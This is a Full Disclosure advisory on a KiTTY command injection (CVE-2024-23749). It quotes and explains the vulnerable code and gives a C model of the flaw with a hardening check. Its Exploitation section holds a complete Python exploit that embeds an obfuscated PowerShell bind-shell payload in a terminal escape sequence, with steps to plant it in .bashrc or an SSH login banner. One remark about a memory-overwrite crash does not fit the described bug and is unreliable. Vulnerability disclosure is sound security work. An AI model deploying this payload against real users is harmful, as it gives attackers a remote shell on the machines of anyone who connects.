
[FD] Command Injection Vulnerability in KiTTY Get Remote File Through SCP Input (CVE-2024-23749)



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Command Injection Vulnerability in KiTTY Get Remote File Through SCP Input 
(CVE-2024-23749)
===========================================================================================

Contents:
---------

Summary

Analysis

Exploitation

Acknowledgments

Timeline

Additional Advisory

Summary:
--------

Austin A. DeFrancesco (DEFCESCO) discovered a command injection vulnerability 
in KiTTY (https://github.com/cyd01/KiTTY/). This vulnerability:

-   Is exploitable against any KiTTY user who connects to a host that emits 
    the embedded exploit;
-   Was introduced in the original release in May 2021 (commit 4f79b1e) and 
    affects all versions through KiTTY 0.76.1.13 in their default 
    configuration.

Austin developed an exploit for this vulnerability and obtained remote code 
execution in the context of the user running the application; KiTTY runs as a 
Standard User by default, so the payload executes with that user's privileges. 
The exploit is stable and repeatable on Microsoft Windows 11/10/8/7/XP.

Analysis:
---------

The CVE-2024-23749 command injection lies in `kitty.c`, in the `GetOneFile` 
function. The vulnerable code is on lines 2369-2386 of the latest revision, 
`75fa2abcd220c172` 
(https://github.com/cyd01/KiTTY/blob/75fa2abcd220c17249ff7252f8d5224137001f2d/kitty.c#L2369C4-L2391C2).

If KiTTY encounters the escape sequence `\033]0;__rv` in the terminal stream, 
it interprets it as an instruction to fetch a file using PSCP (the PuTTY Secure 
Copy client):

-   `\033`: the escape character (octal representation of ASCII ESC, 0x1B), 
    which signals the beginning of an escape sequence.
-   `]0;`: opens an OSC (Operating System Command) sequence with parameter 0, 
    which terminals normally use to set the window title; KiTTY additionally 
    treats a title beginning with `__` as an internal metacommand.
-   `__rv:`: the vulnerable KiTTY command to transfer a file with PSCP; it 
    takes a filename or file path as its argument.
-   `\007`: the BEL character (octal 7), which terminates the sequence; the 
    exploit below ends its payload with exactly this byte.
-   KiTTY's `__rv` handler in `kitty.c` then runs through handling specific to 
    the input parameters and configuration.

After the handling of the other input parameters and configuration (lines 
2277-2368), KiTTY checks whether `filename` is an absolute path (line 2369) 
and otherwise whether a `directory` prefix is set and `filename` is non-empty 
(line 2372). In the plain case the filename is concatenated onto `buffer` 
as-is (line 2377), the destination directory is appended (line 2380), and the 
assembled command line is executed with `system( buffer )` (line 2386).

CVE-2024-23749 occurs because the `filename` variable reaches `system()` with 
no input validation or sanitisation and no escaping of shell metacharacters 
(lines 2369-2390). An attacker who controls the filename can therefore close 
the surrounding double quote and append further commands, leading to 
arbitrary code execution.

    2369     if( filename[0]=='/' ) {
    2370         strcat(buffer, filename ) ;
    2371     } else {
    2372         if( (directory!=NULL) && (strlen(directory)>0) && (strlen(filename)>0) ) {
    2373             strcat( buffer, directory ) ; strcat( buffer, "/" ) ; strcat( buffer, filename ) ;
    2374         } else if( (directory!=NULL) && (strlen(directory)>0) ) {
    2375             strcat(buffer, directory ) ; strcat( buffer, "/*") ;
    2376         } else {
    2377             strcat(buffer, filename ) ;
    2378         }
    2379     }
    2380     strcat( buffer, "\" \"" ) ; strcat( buffer, dir ) ; strcat( buffer, "\"" ) ;
    2381     //strcat( buffer, " > kitty.log 2>&1" ) ; //if( !system( buffer ) ) unlink( "kitty.log" ) ;
    2382 
    2383     chdir( InitialDirectory ) ;
    2384 
    2385     if( debug_flag ) { debug_logevent( "Get on file: %s", buffer) ; }
    2386     if( system( buffer ) ) { MessageBox( NULL, buffer, "Transfer problem", MB_OK|MB_ICONERROR ) ; }
    2387 
    2388     //debug_log("%s\n",buffer);//MessageBox( NULL, buffer, "Info",MB_OK );
    2389 
    2390     memset(buffer,0,strlen(buffer));
    2391 }
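The sequence parsing described above and the unescaped concatenation in lines 
2369-2386 can be modelled together. The following is an added example written 
for this advisory, not code from KiTTY: it extracts the `__rv:` filename from a 
raw OSC 0 sequence the way the terminal sees it, builds the command line the 
way `GetOneFile` does, and then shows a hardening check that rejects filenames 
containing shell metacharacters before anything reaches `system()`. The 
`pscp "host:` prefix, the destination directory and the two sample streams are 
assumptions, since the advisory quotes only the tail of the buffer construction.

```c
#include <stdio.h>
#include <string.h>

#define ESC 0x1b
#define BEL 0x07

/* Constructed sample streams (assumptions, not captured from a real session):
 * the exploit's shape with calc.exe standing in for the PowerShell payload,
 * and a benign request for a file. */
#define EVIL_STREAM "\033]0;__rv:\" & calc.exe #\007"
#define GOOD_STREAM "\033]0;__rv:/etc/motd\007"

/* Scratch buffers used by main() below. */
char demo_name[256];
char demo_cmd[512];

/* Find an OSC 0 title sequence  ESC ] 0 ; __rv: <filename> BEL  (or one
 * terminated by ST = ESC \) in a raw terminal byte stream and copy <filename>
 * to out, NUL-terminated.  Returns 1 on success, 0 if there is no complete
 * sequence or it does not fit in out. */
int extract_rv_filename(const unsigned char *stream, size_t len,
                        char *out, size_t outsz)
{
    static const char tag[] = "]0;__rv:";
    const size_t taglen = sizeof tag - 1;
    size_t i, start, end;

    for (i = 0; i + 1 + taglen <= len; i++) {
        if (stream[i] != ESC || memcmp(stream + i + 1, tag, taglen) != 0)
            continue;
        start = end = i + 1 + taglen;
        while (end < len && stream[end] != BEL && stream[end] != ESC)
            end++;
        if (end >= len)
            return 0;                          /* unterminated sequence */
        if (stream[end] == ESC && !(end + 1 < len && stream[end + 1] == '\\'))
            return 0;                          /* ESC that is not ST */
        if (end - start >= outsz)
            return 0;                          /* too long for out */
        memcpy(out, stream + start, end - start);
        out[end - start] = '\0';
        return 1;
    }
    return 0;
}

/* What kitty.c does at lines 2369-2380 when no directory prefix is set: the
 * remote filename is dropped into a double-quoted shell command line with no
 * escaping.  The pscp/host prefix is an assumption; GetOneFile builds the real
 * one before the lines quoted in the advisory. */
void build_get_command_vulnerable(const char *filename, const char *dest_dir,
                                  char *buffer, size_t bufsz)
{
    snprintf(buffer, bufsz, "pscp \"host:%s\" \"%s\"", filename, dest_dir);
}

/* Hardening check to run before the command line is built: reject control
 * characters and anything cmd.exe could read as quoting, redirection, piping,
 * variable expansion or command chaining. */
int rv_filename_is_safe(const char *filename)
{
    const unsigned char *p;

    if (filename == NULL || filename[0] == '\0')
        return 0;
    for (p = (const unsigned char *)filename; *p; p++) {
        if (*p < 0x20 || *p == 0x7f)
            return 0;
        if (strchr("\"'&|<>^%$`;(){}", *p) != NULL)
            return 0;
    }
    return 1;
}

/* A fixed GetOneFile in miniature: returns 1 and leaves the command line in
 * buffer only if the request passed the check, 0 if it was rejected. */
int handle_rv_request(const unsigned char *stream, size_t len,
                      char *buffer, size_t bufsz)
{
    char filename[256];

    if (!extract_rv_filename(stream, len, filename, sizeof filename))
        return 0;
    if (!rv_filename_is_safe(filename))
        return 0;
    build_get_command_vulnerable(filename, "C:\\Users\\victim\\Downloads",
                                 buffer, bufsz);
    return 1;
}

int main(void)
{
    const unsigned char *evil = (const unsigned char *)EVIL_STREAM;
    const unsigned char *good = (const unsigned char *)GOOD_STREAM;

    extract_rv_filename(evil, strlen(EVIL_STREAM), demo_name, sizeof demo_name);
    build_get_command_vulnerable(demo_name, "C:\\Users\\victim\\Downloads",
                                 demo_cmd, sizeof demo_cmd);
    printf("unfixed command line : %s\n", demo_cmd);   /* calc.exe chained in */
    printf("hardened, evil input : %d\n",
           handle_rv_request(evil, strlen(EVIL_STREAM), demo_cmd, sizeof demo_cmd));
    printf("hardened, good input : %d\n",
           handle_rv_request(good, strlen(GOOD_STREAM), demo_cmd, sizeof demo_cmd));
    return 0;
}
```

The metacharacter check is the smallest change that stops the quote-and-chain 
pattern the exploit relies on; the more robust fix is not to go through 
`cmd.exe` at all and to start pscp with an argument vector. The example also 
bounds the write with `snprintf`, which the original `strcat` chain does not.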

Exploitation:
-------------

### __rv Command Injection:

From an attacker's point of view, the exploit for CVE-2024-23749 can be placed 
in the `.bashrc` file for all users or in the SSH warning/message of the day 
(MOTD) banner. It triggers as soon as the user logs in or is shown the banner, 
because KiTTY parses the escape sequence out of the session output.

KiTTY’s `__rv` function crashed (at line 2601) because adjacent memory was 
overwritten.

To reproduce the vulnerability, follow these steps:

1.  Start KiTTY and open an SSH session to the host you control.
2.  Update the payload handler and payload as documented in the exploit's 
    comments.
3.  Save the exploit on the remote host reached by the SSH session.
4.  Execute the exploit there with Python: `python3 CVE-2024-23749.py`; its 
    output is consumed by the KiTTY session.

    #!/usr/bin/python
    #----------------------------------------------------------------------------------------#
    # Exploit: KiTTY ≤ 0.76.1.13 Command Injection Vulnerability in KiTTY                     #
    #          Get Remote File Through SCP Input (CVE-2024-23749)                             #
    # OS: Microsoft Windows 11/10/8/7/XP                                                      #
    # Author: DEFCESCO (Austin A. DeFrancesco)                                                #
    # Software:                                                                               #
    # <https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip>   #
    #----------------------------------------------------------------------------------------#
    # More details can be found on my blog: <https://blog.DEFCESCO.io/Hell0+KiTTY>            #
    #----------------------------------------------------------------------------------------#
    # msf6 payload(cmd/windows/powershell_bind_tcp) > to_handler                              #
    # [*] Payload Handler Started as Job 1                                                    #
    # msf6 payload(cmd/windows/powershell_bind_tcp) >                                         #
    # [*] Started bind TCP handler against 192.168.100.28:4444                                #
    # [*] Powershell session session 1 opened (192.168.100.119:36969 -> 192.168.100.28:4444)  #
    #----------------------------------------------------------------------------------------#
    
    import os
    import sys
    
    #-----------------------------------------------------------------#
    # msf6 payload(cmd/windows/powershell_bind_tcp) > generate -f raw #
    #-----------------------------------------------------------------#
    # Raw msfvenom output: a PowerShell one-liner that base64-decodes and
    # gunzips the bind-shell script, then runs it with -ep bypass.
    shellcode = b'powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create'
    shellcode += b'((New-Object System.IO.StreamReader(New-Object System.IO.Compression.G'
    shellcode += b'zipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBa'
    shellcode += b'se64String(((\'H4sIAE7efGUCA5VVTW/b{2}BC{1}+1cMD{2}1GQiTCDXoKkGJdNV0Ey'
    shellcode += b'LZGlTYHw0BoahxrQ5NekoptJP7vJSXqw3\'+\'GCbXWwJc7w8fHNG3JRCmYKKeBvNMktzh'
    shellcode += b'kvUBgYPA3APsGG\'+\'wQV8wU3ydf4vMgPJzW6NX+gK7aAhNj+t8ptk8l3jJ1zQkptUYW4'
    shellcode += b'jBeXa\'+\'QgRGld\'+\'hmTZTc7siLDDveG2lyB/vBoqG4lhtU{1}suygyo+oYquwvp{1'
    shellcode += b'}mhlViPtZkMrVioo8PhzNNGdSvBj8JDeCS5pXo5HHVJKh1u\'+\'AFWMm85{2}gI/hVGUK'
    shellcode += b'cUCwibZSDB/2A4L0Q+jKpgPa+aywttUKCy\'+\'k6fZzr6viFMtk+wBjSY3bH3tM2bv7XM'
    shellcode += b'8kWhDlXHr\'+\'+pWrqC/RRS{1}vzBiujQWsyxHWVPZv0VX4iErjMeMWulfy15inE7/QcB'
    shellcode += b'g76n6{1}Qa2ZNgrpyhGs8Yj1VlaNWWIdpbokNSNnj6GvQI+P1jxrwN6ghKxUhdmRrEkN/f'
    shellcode += b'pxsLA+wjh8Cm4s+h4SqmF6M{2}cbrqTBFJUpFgWjBn{1}QXuTUmS2lnM8pe5hF0St0yLg0'
    shellcode += b'S+dUN2ms{2}zECUXIeDw3X786GnkEfoFWm21lfuul8Z3A6mwXu35luRMjZyD7PfzyN{\'+'
    shellcode += b'\'1}l5dFHkTDqcGt4agYDJ3jj4/H2fp1VXkFP/ocsLhrbWm3GiYu{2}bJlsg5qFIImw\'+'
    shellcode += b'\'1Wj1Jbew7hFAIUj+fuS7jmPrVjtjRtgMnVujRd8E6kcr\'+\'1Txf3SQJhG8E/BlNRyY'
    shellcode += b'SCVai1VJSGBsVvMJWlQaLEfMSd34k5443k5yK0tBobdxuJR3H2Qax\'+\'T3Ztk3Tt{2}2'
    shellcode += b'fesc{2}ef3VJqezuDaQjpZfMuTlufvc21mfZbqkrKl5VyDQiHaI6XL6mi7Jzw4iSPS7LY+'
    shellcode += b'tBqk6PlKPMoHTC63a6uttnq3KPu+pTbLgmMYBkXlunoT35DmYe2xGEYxBAfsI0gEwuhI0k'
    shellcode += b'unH+Y3Vsu3LgXfmC6FVBpfes07FNte1FHpofnzodpd\'+\'IyoERfSimrYbXTGP{1}g1Jc'
    shellcode += b'7\'+\'jV4Gcf/nwHz/C1NEmNCt48B1BnUAnSAJ/CySSDE/tf6X8tWeXhiEyoWbroBzjpQL'
    shellcode += b'a{2}SIBKSTUdzQ4W67Gu4oRxpCqMXmNw0f+wrbYdHBv4l/zbwfyvY/uGPfJrM+czL/Wyve'
    shellcode += b'/8weMP85RLjX4/VTs2t1DfMN3VlBm5bu4j/2ud2V7lbe3cFfoTVXnPBo0IAAA{0}\')-f'
    shellcode += b'\'=\',\'9\',\'O\')))),[System.IO.Compression.CompressionMode]::Decompr'
    shellcode += b'ess))).ReadToEnd()))\"'
    
    # OSC 0 title sequence: ESC ] 0 ; __rv: <filename> BEL.  KiTTY treats a
    # title beginning with __rv: as "get remote file via pscp" and pastes
    # <filename> into a shell command line unescaped, so a closing double
    # quote followed by "&" chains the payload onto the pscp command; the
    # trailing "#" is there to neutralise the quote and destination directory
    # that KiTTY appends after the filename.
    escape_sequence = b'\033]0;__rv:'
    escape_sequence += b'" & '
    escape_sequence += shellcode
    escape_sequence += b' #\007'
    
    # Write raw bytes so ESC and BEL are not altered by text-mode stdout;
    # anything that echoes this into a KiTTY session (.bashrc, MOTD) fires it.
    stdout = os.fdopen(sys.stdout.fileno(), 'wb')
    stdout.write(escape_sequence)
    stdout.flush()
    

Acknowledgments:
----------------

Austin thanks the MITRE CVE Assignment Team for their assistance with the CVE 
service requests.

Timeline:
---------

2024-01-08: This advisory (one vulnerability) and the additional advisory 
below (two vulnerabilities), three vulnerabilities in total, sent to KiTTY 
maintainer Cyril Dupont; no reply from Cyril.

2024-01-28: Follow-up email with the assigned CVE numbers and full writeups 
sent to Cyril Dupont; no reply.

2024-02-07: Public Advisory & Exploits Release Date (6:00 PM UTC).

Additional Advisory:
--------------------

Buffer Overflow Vulnerabilities in KiTTY Start Duplicated Session Hostname 
(CVE-2024-25003) & Username (CVE-2024-25004) Variables: 
https://blog.defcesco.io/CVE-2024-25003-CVE-2024-25004
-----BEGIN PGP SIGNATURE-----
Version: ProtonMail

wnUEARYKACcFgmXDxSAJkLsLizjqexAlFiEETZ4dNJxyJAAtf1r5uwuLOOp7
ECUAAFkhAQD2y/dueupEMnNKAxNfh243Q25I+ofw2gxvT1cg6nkniQEAgH5A
7uuWKGMhwDEqQCrVtc2+yZ3h1hbdJI/8ZbCLhAc=
=j94V
-----END PGP SIGNATURE-----

Attachment: publickey - austin@defcesco.io - 0x4D9E1D34.asc
Description: application/pgp-keys

Attachment: publickey - austin@defcesco.io - 0x4D9E1D34.asc.sig
Description: PGP signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/